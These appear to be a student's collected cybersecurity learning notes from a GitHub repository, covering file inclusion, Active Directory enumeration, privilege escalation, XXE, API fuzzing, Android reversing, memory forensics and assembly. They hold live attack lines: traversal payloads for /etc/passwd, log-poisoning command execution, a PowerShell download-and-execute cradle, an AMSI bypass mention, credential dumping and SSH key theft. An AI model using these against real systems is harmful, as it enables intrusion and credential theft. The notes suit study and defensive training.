Resource Used : https://tryhackme.com/room/fileinc
```

Local File Inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting a functionality that dynamically includes local files or scripts. The consequences of a successful LFI attack include directory traversal and information disclosure as well as remote code execution.

Typically, Local File Inclusion (LFI) occurs when an application takes the path to the file that has to be included as an input without treating it as untrusted input. This allows a local file to be supplied to the include statement. Local File Inclusion is very much like Remote File Inclusion (RFI), with the difference that with Local File Inclusion an attacker can only include local files (not remote files, as in the case of RFI).

You can do `?page=home.html`

### Directory Traversal

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration and critical system files. It should be noted that access to files is limited by the operating system's access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).

This attack is also known as "dot-dot-slash", "directory traversal", "directory climbing" and "backtracking".

`?page=../creditcard`

You can do `?page=../../../etc/passwd` or something like that.

### Log Poisoning

**In order for that to happen, the directory should have read and execute permissions.**

Applications typically use log files to store a history of events or transactions for later review, statistics gathering, or debugging. Depending on the nature of the application, the task of reviewing log files may be performed manually on an as-needed basis or automated with a tool that automatically culls logs for important events or trending information.

Writing unvalidated user input to log files can allow an attacker to forge log entries or inject malicious content into the logs. This is called log injection.

Log injection vulnerabilities occur when:

1. Data enters an application from an untrusted source.
2. The data is written to an application or system log file.

Successful log injection attacks can cause:

1. Injection of new/bogus log events (log forging via log injection)
2. Injection of XSS attacks, hoping that the malicious log event is viewed in a vulnerable web application
3. Injection of commands that parsers (like PHP parsers) could execute

To read logs try this one → `../../../../../var/log/apache2/access.log`

RFI is remote file inclusion; in this case what the user is able to do is plant any external resource in the `?extension` parameter. This way we can include shells or similar to get RCE.

We can host our shell using a Python web server and then use that resource to execute whatever code we have specified in it, but remember the file extension here: if using PHP the file should be .txt in the RFI parameter, since if it is .php it will be interpreted on our machine instead of on the target.

Another file-upload vulnerability could be unrestricted file upload, so for example the upload function lets us upload .php or .aspx files, and we can get a reverse shell via them by traversing to the uploads directory.
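The defender's side of the two sections above, as an added Python example for these notes (not from the TryHackMe room): a `?page=` resolver that keeps includes inside the pages directory no matter how many `../`, URL-encoded dots, absolute paths or `php://` wrappers are supplied, plus a scan over Apache access-log lines that flags traversal attempts and PHP tags arriving in the User-Agent, which is what a log-poisoning attempt looks like from the log's point of view. The base directory, the log format regex and the three log lines are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Added example for these notes (not from the TryHackMe room): the defender's side of
# the traversal and log-poisoning sections above. Paths and log lines are constructed.

# Traversal variants described above: plain and URL-encoded dot-dot-slash
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%2e%2e|\.%2e|%2e\.)", re.IGNORECASE)
# Any scheme-style prefix (php://, file://, http://) is a wrapper, not a local page name
WRAPPER = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

REASON_TRAVERSAL = "path traversal in request"
REASON_POISON = "php tag in user-agent or request"


def resolve_page(base_dir, page, allowed_suffixes=(".html", ".php")):
    """Map a ?page= value onto a file under base_dir, or raise ValueError.

    base_dir need not exist; the check is a lexical containment check after
    normalisation, which is what makes ../ sequences harmless.
    """
    decoded = unquote(unquote(page))  # undo single and double URL encoding
    if "\x00" in decoded or WRAPPER.match(decoded):
        raise ValueError("wrapper or null byte in page parameter")
    base = Path(base_dir).resolve()
    target = (base / decoded).resolve()  # an absolute `decoded` replaces base entirely
    if base not in target.parents:       # ../ that climbs out of base fails here
        raise ValueError("page resolves outside the pages directory")
    if target.suffix not in allowed_suffixes:
        raise ValueError("extension not allowed")
    return target


# Apache combined log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def scan_access_log(lines):
    """Yield (ip, reason) for lines that look like traversal or log-poisoning attempts."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        req, ua = m["req"], m["ua"]
        if TRAVERSAL.search(req) or TRAVERSAL.search(unquote(req)):
            yield m["ip"], REASON_TRAVERSAL
        if PHP_TAG.search(ua) or PHP_TAG.search(unquote(req)):
            yield m["ip"], REASON_POISON


# Constructed sample log lines: one clean request, one traversal, one poisoned User-Agent
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Oct/2021:23:35:28 +0000] "GET /index.php?page=home.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Oct/2021:23:35:30 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" '
    '200 1024 "-" "curl/7.68.0"',
    '203.0.113.9 - - [11/Oct/2021:23:35:44 +0000] "GET /index.php?page=home.html HTTP/1.1" '
    '200 512 "-" "<?php echo \'poisoned\'; ?>"',
]

if __name__ == "__main__":
    for ip, reason in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

Resolving first and comparing afterwards is the important order: filtering `../` out of the string before the join is what the double-encoding and `....//` tricks defeat, whereas a containment check on the normalised result cannot be talked around.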
This can be exploited if two conditions are met, though : file sanitising is not done so any extension is allowed, and the uploads directory is guessable or known to users.

To turn LFI into log poisoning and RCE we can do the following :

We first need to pass a PHP snippet in the User-Agent field, like so, when we intercept a request to the PHP file that is vulnerable to the LFI :

![[Pasted image 20211011233528.png]]

and then we can use

```bash
/.././.././../log/apache2/access.log&cmd=id
```

to run the command. To see the output, just scroll down to the bottom of the logs and you will see the command's output reflected.

![[Pasted image 20211011233544.png]]

### Base64 Filtering for LFI

For getting files using the base64 filter in LFI attacks we can use this :

```bash
?vulnparam=php://filter/convert.base64-encode/resource=index
```

### Use an LFI Wordlist to get endpoints

If we have LFI and we don't know which paths to go for, my standard approach is to read /etc/passwd, see the usernames and then look for things like `.ssh/id_rsa` for that user, and so on. We can also try brute-forcing the paths; a good list we can use for that :

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt

/Day 3 - Simple Domain Ennumeration in AD/README.md:

Some basic things to know :

1. If you hear AD don't think of it as a domain, think of it as a forest, as Microsoft considers that the security boundary, and normally, if everything works as intended, if a person compromises a domain in a forest it is assumed that the rest of the forest is also compromised.
2. DNS causes a lot of issues in AD.
3. Active Directory handles accessibility, manageability and interoperability of things inside a corporation.

Now cheat sheets for PowerShell / PowerView / the AD module.

```PowerShell
# To get full help about a certain cmdlet
Get-Help -Full
# To get examples of how to use the cmdlet
Get-Help -Examples
# To get all the cmdlets
Get-Command -CommandType cmdlet
# To bypass the execution policy
powershell -ExecutionPolicy bypass
powershell -ep bypass
# To import a module
Import-Module
# Download and execute a script from memory
iex (New-Object Net.WebClient).DownloadString('https://url/payload')
$wr = [System.Net.WebRequest]::Create("url")
$r = $wr.GetResponse()
```

So most of the time when we want to run things like PowerView it won't really work for us due to AMSI, so we have to bypass AMSI before executing our enumeration tools/scripts.
After we have done that, let's try to enumerate with PowerView. Here is the GitHub repo to get it from :

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Then we can transfer this file to the Windows machine, open PowerShell, bypass AMSI and then import PowerView.ps1.

Here is a small cheat sheet to get information via PowerView :

```PowerShell
# Get domain information
Get-NetDomain
Get-NetDomain -Domain ACME.Local # Get info about a particular domain
# Get domain policies
Get-DomainPolicy
# Get users in the current domain
Get-NetUser
Get-NetUser -Filter Username # Get information about a specific user
# Get properties of all users in the current domain
Get-UserProperty
# Get groups in the domain
Get-NetGroup
Get-NetGroup -Domain # Get group info for a specific domain
Get-NetGroup -FullData # Get all data about groups
Get-NetGroup *somethingyouwannasearch* # Get info about a specific group name
# List of computers in the current domain
Get-NetComputer
Get-NetComputer -FullData # Get all the data
# Get members of a group
Get-NetGroupMember -GroupName "NameofGroup"
# Get the group membership of a user
Get-NetGroup -Username "username"
# Get local groups on a machine
Get-NetLocalGroup -ComputerName "computername" -ListGroups
# Get logged-on users on a computer
Get-NetLoggedon -Computer
# Shares on hosts
Invoke-ShareFinder -Verbose
# Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose
# Get all file servers of the domain
Get-NetFileServer
# List of GPOs in this domain
Get-NetGPO
Get-NetGPO -Computer # For a specific computer
Get-NetGPOGroup
# Get OUs in a domain
Get-NetOU -FullData
# Get GPOs applied to an OU
Get-NetGPO -GPOname ""
# Get the ACLs of an object
Get-ObjectAcl -SamAccountName username/objectname -ResolveGUIDs
# Get the ACLs associated with the specified LDAP path
Get-ObjectAcl -ADSpath "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
# Search for interesting ACLs
Invoke-ACLScanner -ResolveGUIDs
# Get all domain trusts
Get-NetDomainTrust
# Info about the forest
Get-NetForest
# All domains in the forest
Get-NetForestDomain
Get-NetForestCatalog # Global catalogs
```

Methodology :
Enumerate users, computers, Domain Administrators, Enterprise Admins and shares, and see if you can get any sensitive information; then map the domain, draw it out, map the trusts, and then use ACL scanners to see if there are any interesting ACLs that you can abuse.

/Day 4 - Lateral Movement and PrivEsc/README.md:

Some things we should always check when we have some sort of initial access: always try to dump credentials, with Mimikatz for example, or get the SAM/SYSTEM files to get credentials and try using them elsewhere. We can also utilise PowerView to enumerate whether we can move to other machines with the access we currently have :

```PowerShell
# Machines in the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
# We can also use other tools like :
Find-WMILocalAdminAccess.ps1
# Find local admins on all machines
Invoke-EnumerateLocalAdmin -Verbose
# Check where the domain admin has sessions, confirm admin access
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -Stealth # To do it stealthily
```

With such techniques and the enumeration we just did above we can try moving around the network. Another great method, in my opinion, is enumeration via BloodHound, which presents all this information in one integrated view and lets you run queries to find out things like paths to admin and so on.

This is a great room for learning more about how to use BloodHound : https://tryhackme.com/room/postexploit

For getting local admin rights we can use a bunch of techniques, like automated scripts such as WinPEAS.exe and PowerUp.

WinPEAS.exe is a suite we can use to automate most of the local enumeration to find things we can abuse.
PowerUp.ps1 is another great tool which can help us look for/exploit service abuse, check what we can do with a service and much more : https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc .

We can also abuse other services/features: say we have something like SMB, we can try default creds, the username as the password, and so on.
P.S : PowerSploit is a great toolkit in itself.

We can use PowerShell Remoting to move to machines inside the network via just PowerShell; tools like psexec and smbexec exist as well.

```PowerShell
# Create a session with a specified port
New-PSSession -ComputerName Server01 -Port 8081 -UseSSL -ConfigurationName E12
# Get an interactive session
Enter-PSSession -ComputerName Server01
```

Also an amazing resource of PowerShell scripts is Nishang : https://github.com/samratashok/nishang

There are scripts for :
1. Scanning
2. Bypassing stuff
3. Escalation
4. MITM
5. Pivoting
6. Shells
7. and much more

You can read the ReadMe.md file.

Another thing we should look for is
```cmd
whoami /priv
```

and then this article https://www.jaacostan.com/2020/09/printspoofer-windows-privilege.html points out that if SeImpersonatePrivilege is enabled we can use PrintSpoofer.exe : https://github.com/itm4n/PrintSpoofer

/Day 5 - XML External Entity Injection/README.md:

### XML External Entity Injection

Resources used : https://portswigger.net/web-security/xxe

XML : It stands for eXtensible Markup Language and is a markup language kind of like HTML, but it was mainly designed to store and transport data, and was designed to be self-descriptive.

Because of how XML works we have attacks such as XML external entity injection, which can let an attacker interfere with an application's processing of XML data, and in most cases leads to file reads.
In some cases an XXE attack can be escalated to compromise the underlying server, or used to perform an SSRF attack.

We can use this to :
1. Retrieve files
2. Perform SSRF attacks
3. Exfiltrate data out of band
4. Blind XXE to retrieve data via error messages

A great resource to learn from is this : https://www.youtube.com/watch?v=gjm6VHZa_8s&t

Some snippets of XXE payloads from PayloadsAllTheThings : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

```xml
# If it's visible and is parsed
]>&test;
# XML to SSRF

]>
&xxe;
# Out of Band XXE

]
>
&callhome;

# External DTD, PHP filter

%sp;
%param1;
]>
&exfil;

File stored on http://127.0.0.1/dtd.xml

">
```

/Day 6 - API Basic Techniques/README.md:

### API Enumeration and stuff

Resources used : https://www.youtube.com/watch?v=yCUQBc2rY9Y

API : Application Programming Interface

Used in web and mobile apps, and a lot of developers are lazy.

APIs look kinda like this :
```

GET /apiendpoint/1 # Example of REST
GET /apiendpoint?param=somevaluetoquery # Example of GraphQL

```

APIs often use JSON or XML; JSON is way more common. Types of APIs are SOAP, RESTful, GraphQL, etc.
JSON : Is just a way to represent data in a text format; JSON objects start with curly braces {} and arrays start with [].

Apps which might have APIs :
1. Web app which has a mobile app
2. Apps with a lot of frontend complexity
3. Almost all mobile apps
4. Web pages taking a long time to load
5. Web app with dev documentation

The two main ones are GraphQL and RESTful.

RESTful : Super easy to spot; they use CRUD operations as their basis and are the most popular ones.
**Try playing around with the type of request and possible endpoints all the time: if GET exists maybe a DELETE or UPDATE exists as well.**

GraphQL : Difficult to spot; some examples could be gql?q=, graphql?q= or g?q=. Everything is on one endpoint, so it is super easy to enumerate, and it uses mutations, queries and so on.

Our main goal with most API enumeration is to fuzz these endpoints on REST or GraphQL APIs, which can lead to sensitive data disclosure, and also to play around with them and with the request type, like POST, CREATE, UPDATE, DELETE and so on.

To do this fuzzing we can use tools like ffuf, wfuzz and so on. A quick cheat sheet on ffuf is here :
```bash
ffuf -w /path/to/wordlist -u https://target/api/FUZZ # Fuzzing an API endpoint on website target

# ffuf ignoring pages which give a 401 error
ffuf -w /path/to/values.txt -u https://target/script.php?valid_name=FUZZ -fc 401

# Fuzz POST request data
ffuf -w /path/to/postdata.txt -X POST -d "username=admin&password=FUZZ" -u https://target/login.php -fc 401
```

Link to ffuf and its documentation : https://github.com/ffuf/ffuf

Here is the link to wfuzz : https://github.com/xmendez/wfuzz

Here is a link to another tool called Arjun, which we can use to discover HTTP parameters with a huge default dictionary; it tests and plays around with different params.

Link to Arjun : https://github.com/s0md3v/Arjun

/Day 7 - Android Hacking Basic Techniques/README.md:

### Android Hacking 101

Resources used : https://tryhackme.com/room/androidhacking101

There are two types of apps : native and hybrid apps.
Native : Made for a mobile OS specifically; Android uses Java or Kotlin and iOS uses Swift or Objective-C.

Hybrid : These are made using hybrid frameworks like Flutter, React Native and so on.

As we are mainly talking about Android hacking here: if you create an Android APK file it contains a .dex file, which contains binary Dalvik bytecode, and this corresponds to smali, which is the assembly language of the Dalvik VM.

Smali types :
V : void
Z : boolean
B : byte
S : short
C : char
F : float
I : int
J : long
D : double
[ : array

Smali registers, by JesusFreke :

In Dalvik's bytecode, registers are always 32 bits and can hold any type of value. 2 registers are used to hold 64-bit types (long and double).

There are two ways to specify how many registers are available in a method: the .registers directive specifies the total number of registers in the method, and the .locals directive specifies the number of non-parameter registers in the method.

When a method is called the parameters are placed in the last n registers; for example, if 2 arguments are passed and the method has 5 registers (v0 - v4), the parameters would be placed in v3 and v4.

Let's first find a tool to help us emulate things: with Android apps it is a good call to find an application to emulate those apps on our computer.

https://www.genymotion.com/ : For Linux
https://www.bignox.com/ : For Windows and Mac

Information Gathering -> Reversing -> Static Analysis -> Dynamic Analysis -> Report

To get some information we can search for the app on the Play Store, and we can see the id of the package when we click on the app we searched for and opened.

Now to debug these APKs we first need to download them; for this we use a tool called **Android Debug Bridge (ADB)**.
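The type letters and the register rule above are exactly what you need when reading a `.method` line in decompiled smali, so here is a small Python helper, added for these notes and not from the room or the write-up, that parses Dalvik type descriptors (including arrays and `Lpackage/Class;` references) and works out which `v` registers hold each parameter for a given `.registers` count, with long and double taking two registers. It also goes a step beyond the note's single example by handling instance methods, where `this` is the first hidden parameter. The method signatures used are constructed for illustration.

```python
# Added example for these notes (not from the room or the write-up): a parser for
# Dalvik type descriptors and the parameter-register rule described above. Method
# signatures are constructed for illustration.

PRIMITIVES = {"V": "void", "Z": "boolean", "B": "byte", "S": "short", "C": "char",
              "F": "float", "I": "int", "J": "long", "D": "double"}
WIDE = {"long", "double"}  # 64-bit types occupy two 32-bit registers


def parse_descriptor(desc, pos=0):
    """Parse one type descriptor starting at desc[pos]; return (human_name, next_pos)."""
    c = desc[pos]
    if c in PRIMITIVES:
        return PRIMITIVES[c], pos + 1
    if c == "[":                                 # array of whatever follows
        inner, nxt = parse_descriptor(desc, pos + 1)
        return inner + "[]", nxt
    if c == "L":                                 # Lpackage/Class; reference type
        end = desc.index(";", pos)
        return desc[pos + 1:end].replace("/", "."), end + 1
    raise ValueError(f"bad descriptor at {pos}: {desc[pos:]!r}")


def parse_method(sig):
    """Parse 'name(params)ret' as written after .method, e.g. 'check(IJ[Ljava/lang/String;)Z'."""
    name, rest = sig.split("(", 1)
    params_desc, ret_desc = rest.split(")", 1)
    params, pos = [], 0
    while pos < len(params_desc):
        t, pos = parse_descriptor(params_desc, pos)
        params.append(t)
    ret, _ = parse_descriptor(ret_desc)
    return name, params, ret


def param_registers(sig, registers, static=False):
    """Map each parameter (and 'this' for instance methods) to the v-registers holding it.

    `registers` is the value of the .registers directive; parameters occupy the
    last N registers, where N counts wide types twice.
    """
    _, params, _ = parse_method(sig)
    slots = [] if static else [("this", 1)]
    slots += [(t, 2 if t in WIDE else 1) for t in params]
    needed = sum(n for _, n in slots)
    if needed > registers:
        raise ValueError("method frame too small for its parameters")
    v = registers - needed                       # first parameter register
    mapping = []
    for t, n in slots:
        mapping.append((t, [f"v{v + i}" for i in range(n)]))
        v += n
    return mapping


if __name__ == "__main__":
    sig = "check(IJ[Ljava/lang/String;)Z"        # constructed example signature
    print(parse_method(sig))
    for t, regs in param_registers(sig, registers=6, static=True):
        print(f"{t:20s} -> {', '.join(regs)}")
```

With `.registers 5` and two `int` parameters in a static method this reproduces the note's example (v3 and v4); `.locals` is simply `registers - needed`, the count of registers left for the method's own temporaries.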
With the APK on disk we can decompile it. jadx loads an APK or .dex file and shows decompiled Java code; it also has a GUI version (jadx-gui):

```bash
jadx -d [path-output-folder] [path-apk-or-dex-file]
```

Alternatively, dex2jar converts the APK's Dalvik bytecode into a .jar, which we can then inspect in JD-GUI (http://java-decompiler.github.io/):

```bash
d2j-dex2jar.sh /path/application.apk
```

To see the smali (disassembled bytecode) rather than decompiled Java, together with the decoded resources and AndroidManifest.xml, use apktool:

```bash
apktool d app.apk
```
-------------------------------------------------------------------------------- /Day 8 - Voltatlity Forensics/README.md: --------------------------------------------------------------------------------
### Volatility

Resources used : https://tryhackme.com/room/bpvolatility

Volatility is a free memory forensics framework developed and maintained by the Volatility Foundation. Regarded as the gold standard for memory forensics in incident response, it is widely extensible through a plugin system and is an invaluable tool for any Blue Teamer. (The commands below use Volatility 2 syntax; Volatility 3 names its plugins differently, e.g. windows.pslist, and no longer needs a profile.)

A memory capture can be obtained in many ways, and the easiest method depends on what you are working with. A live (powered-on) machine can have its memory captured with one of the following tools:

- FTK Imager
- Redline (requires registration, but has a very nice GUI)
- DumpIt.exe
- win32dd.exe / win64dd.exe (good PsExec support, handy for IT departments whose EDR can't capture memory)

These tools typically output a .raw file containing an image of system memory; .raw is one of the most common memory file formats you will see in the wild.

Offline (powered-off) machines can also have their memory recovered fairly easily, as long as their drives aren't encrypted.
On Windows this is done by pulling the following file:

%SystemDrive%\hiberfil.sys

hiberfil.sys, the Windows hibernation file, contains a compressed image of memory from the previous boot. Windows uses it to speed up boot; we can use it for memory forensics (Volatility 2's imagecopy plugin converts it to a raw image).

Virtual machines make this even easier. Here is where the memory image lives for the common hypervisors:

```
VMware - .vmem file
Hyper-V - .bin file
Parallels - .mem file
VirtualBox - .sav file *This is only a partial memory file. You'll need to dump memory as on a normal bare-metal system for this hypervisor
```

Now that we have a memory image, let's dig into it. First we need to determine which profile to use: a profile tells Volatility how to interpret the image, since every Windows version lays out its kernel structures a little differently. List the suggested profiles with:

```bash
volatility -f MEMORY_FILE.raw imageinfo
```

Besides listing active processes (pslist), we can view the network connections that were open at the time of capture:

```bash
volatility -f MEMORY_FILE.raw --profile=PROFILE netscan
```

netscan only supports Vista and newer, so on the old (XP/2003 era) target in this room it errors out; for those profiles the connections, connscan, sockets and sockscan plugins do the same job. Malware commonly tries to hide its process, for example by unlinking it from the kernel's process list. psxview cross-references several independent ways of finding processes, so a process hidden from one of them (pslist) still shows up in the others (psscan and friends); we can view intentionally hidden processes via the command `psxview`.

In addition to psxview, we can look at the loaded modules of each process with a greater focus via the command `ldrmodules`.
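Here is an added Python triage helper (my example, not part of the THM room or of Volatility) that applies the two rules from this section to plugin output: a process that psscan finds but pslist does not, with no exit time, is hidden; an ldrmodules row with a False in InLoad, InInit or InMem is suspect, except the InInit False that a process's own executable always shows. The sample lines are constructed in the column layout of Volatility 2's psxview and ldrmodules output and are not from a real image.

```python
# Constructed sample output in the column layout of Volatility 2's psxview and
# ldrmodules plugins (not from a real memory image).
PSXVIEW_OUTPUT = """\
Offset(P)  Name                    PID pslist psscan thrdproc pspcid csrss session deskthrd ExitTime
---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- --------
0x02029ab8 svchost.exe             1024 True   True   True     True   True  True    True
0x02157020 updater.exe             1640 False  True   True     True   True  True    True
0x021e6da0 cmd.exe                 2032 False  True   False    False  False False   False    2012-07-22 02:45:37 UTC+0000
"""

LDRMODULES_OUTPUT = """\
Pid      Process              Base       InLoad InInit InMem MappedPath
-------- -------------------- ---------- ------ ------ ----- ----------
    1024 svchost.exe          0x01000000 True   False  True  \\WINDOWS\\system32\\svchost.exe
    1024 svchost.exe          0x7c900000 True   True   True  \\WINDOWS\\system32\\ntdll.dll
    1640 updater.exe          0x00400000 True   False  True  \\Program Files\\Updater\\updater.exe
    1640 updater.exe          0x003b0000 False  False  False
"""

PSXVIEW_COLUMNS = ("pslist", "psscan", "thrdproc", "pspcid", "csrss", "session", "deskthrd")


def _data_rows(output):
    """Yield whitespace-split data rows, skipping the header line and the dashed rule."""
    for line in output.splitlines()[2:]:
        if line.strip():
            yield line.split()


def hidden_processes(psxview_output):
    """Processes that psscan finds but pslist does not, and that have no ExitTime.
    An exited process also shows pslist False, so it is deliberately not counted."""
    hidden = []
    for parts in _data_rows(psxview_output):
        name, pid = parts[1], int(parts[2])
        flags = dict(zip(PSXVIEW_COLUMNS, parts[3:10]))
        exit_time = " ".join(parts[10:])          # date strings contain spaces
        if flags["pslist"] == "False" and flags["psscan"] == "True" and not exit_time:
            hidden.append((pid, name))
    return hidden


def suspicious_modules(ldrmodules_output):
    """Rows with a False in InLoad/InInit/InMem, except the process's own executable,
    which is never in the InInit list and therefore legitimately shows InInit False.
    Rows with no MappedPath at all (unmapped) are the classic injection signature."""
    findings = []
    for parts in _data_rows(ldrmodules_output):
        pid, process, base = int(parts[0]), parts[1], parts[2]
        in_load, in_init, in_mem = (p == "True" for p in parts[3:6])
        path = " ".join(parts[6:])                # paths may contain spaces
        is_own_exe = path.lower().endswith("\\" + process.lower())
        if not in_load or not in_mem or (not in_init and not is_own_exe):
            findings.append((pid, process, base, path or "<unmapped>"))
    return findings


if __name__ == "__main__":
    print("hidden processes:", hidden_processes(PSXVIEW_OUTPUT))     # [(1640, 'updater.exe')]
    print("suspicious modules:", suspicious_modules(LDRMODULES_OUTPUT))  # one unmapped row in pid 1640
```

To use it on a real case, save the plugin output to files (volatility ... psxview > psxview.txt) and pass the file contents in. The exit-time and own-executable exceptions are what keep a clean system from producing noise; without them every terminated process and every main module would be reported.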
Three columns in the middle of the ldrmodules output matter: InLoad, InInit and InMem, which tell whether the module appears in each of the three module lists kept in the process's PEB. If any of them is False the module may have been injected or unlinked, which is a bad sign. Filtering the output for False should return next to nothing on a clean system (the main executable legitimately shows InInit False, because the exe itself is never in the initialization-order list).

Processes aren't the only area of concern. The apihooks command shows unexpected patches (hooks) in the standard system DLLs; a hit whose Hooking module is <unknown> is really bad, since legitimate hooks come from a named module. Injected code is a huge issue and highly indicative of compromise; we can check for it with malfind, which looks for memory regions that are executable, private and not backed by a file on disk. Using the full command

```bash
volatility -f MEMORY_FILE.raw --profile=PROFILE malfind -D /path/to/dump_dir
```

we not only find this code but also dump each suspicious region into the given directory (which must already exist) for further analysis.

Last but certainly not least, we can list all the DLLs loaded into each process with dlllist. DLLs are shared libraries used by system processes and are commonly subjected to hijacking and side-loading attacks, making them a key target for forensics.
-------------------------------------------------------------------------------- /Day 9 - Assembly Language Basics/README.md: --------------------------------------------------------------------------------
### Introduction to Assembly x86-64

Resource Used : https://tryhackme.com/room/introtox8664

Since the architecture is x86-64, the general-purpose registers are 64 bits wide and there are 16 of them.

In 64-bit mode the full registers start with r (rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp and r8 to r15); their 32-bit lower halves start with e (eax, ebx, ...) or end in d (r8d to r15d). Refer to the THM room for the full table.

Each register holds up to 64 bits, and its lower 32, 16 and 8 bits can be referenced separately (for example rax, eax, ax, al). %rsp is the stack pointer: it holds the address of the top of the stack, i.e. of the most recently pushed value.
The stack is the region of memory that holds a program's function-call state: local variables, saved registers and return addresses. The instructions below are written in AT&T syntax (source operand first, destination second, registers prefixed with %), which is GDB's default; with the Intel flavour set on Day 1 the operand order is reversed. The q suffix means a 64-bit (quadword) operand.

- `leaq source, destination`: stores the address computed by the expression in source into destination (no memory access, so it is also used for plain arithmetic)

- `addq source, destination`: destination = destination + source

- `subq source, destination`: destination = destination - source

- `imulq source, destination`: destination = destination \* source

- `salq source, destination`: destination = destination << source, where << is the left bit-shift operator

- `sarq source, destination`: destination = destination >> source, where >> is the arithmetic right shift (the sign bit is preserved)

- `xorq source, destination`: destination = destination XOR source

- `andq source, destination`: destination = destination & source

- `orq source, destination`: destination = destination | source


If statements use three important kinds of instructions in assembly:

- `cmpq source2, source1`: computes source1 - source2 and sets the flags, without storing the result

- `testq source2, source1`: computes source1 & source2 and sets the flags, without storing the result

The conditional jumps then read those flags (signed comparisons use SF and OF, unsigned ones use CF):

jmp : unconditional
je  : equal / zero
jne : not equal / not zero
js  : negative
jns : nonnegative
jg  : greater (signed)
jge : greater or equal (signed)
jl  : less (signed)
jle : less or equal (signed)
ja  : above (unsigned)
jb  : below (unsigned)

--- under work ---
-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
# Cyber Security Knowledge

A project where I try to learn something new every 2 days: one day for learning, the next for applying the knowledge. This repository is where I track it.
The idea is to learn a new thing and then apply it: invest some time on Day 1 researching the subject, then on Day 2 apply that knowledge on a platform, for example by doing an HTB challenge or a PortSwigger Academy lab.

This challenge was inspired by one I found on LinkedIn: https://github.com/harsh-bothra/learn365

**This challenge is mostly about learning, so the notes here are not all my own work. I use a lot of resources and try to link them; if any resource is not mentioned, please message me and I will add it.**

**I am continuing the challenge after a bit of a break. I also noticed that most of the entries up to Day 28 are thin, so I will be revamping them and adding more information later as well.**

Day 1 : Basics of Linux Stack Smashing / Buffer Overflows / Intro to GDB

Day 2 : Practice on HTB

Day 3 : Basic AD Enumeration via PowerView and the AD Module

Day 4 : Privilege Escalation on a basic level in AD environments

Day 5 : XML External Entity Injection Attacks

Day 6 : API Endpoint Basic Enumeration

Day 7 : Android Hacking Basic Tools

Day 8 : Volatility Forensics

Day 9 : Assembly Language Basics

Day 10 : Report Writing

Day 11 : Sysinternals

Day 12 : Core Windows Processes

Day 13 : Event Logs

Day 14 : Yara

Day 15 : ROP Based Buffer Overflows (Basics)

Day 16 : OAuth Basics

Day 17-19 : NahamCon

Day 20 : File Transfers

Day 21 : Pwntools Usage Basics

Day 22 : GraphQL Basics

Break : HTB Battlegrounds Tournament and University Studies

Day 23 : Bash Scripting and Linux Commands

Day 24 : PowerShell Basics

Break.
Day 25 : x64 Basic Linux Buffer Overflows (No Protections)

Day 26 : .NET Executable Reversing


--------------------------------------------------------------------------------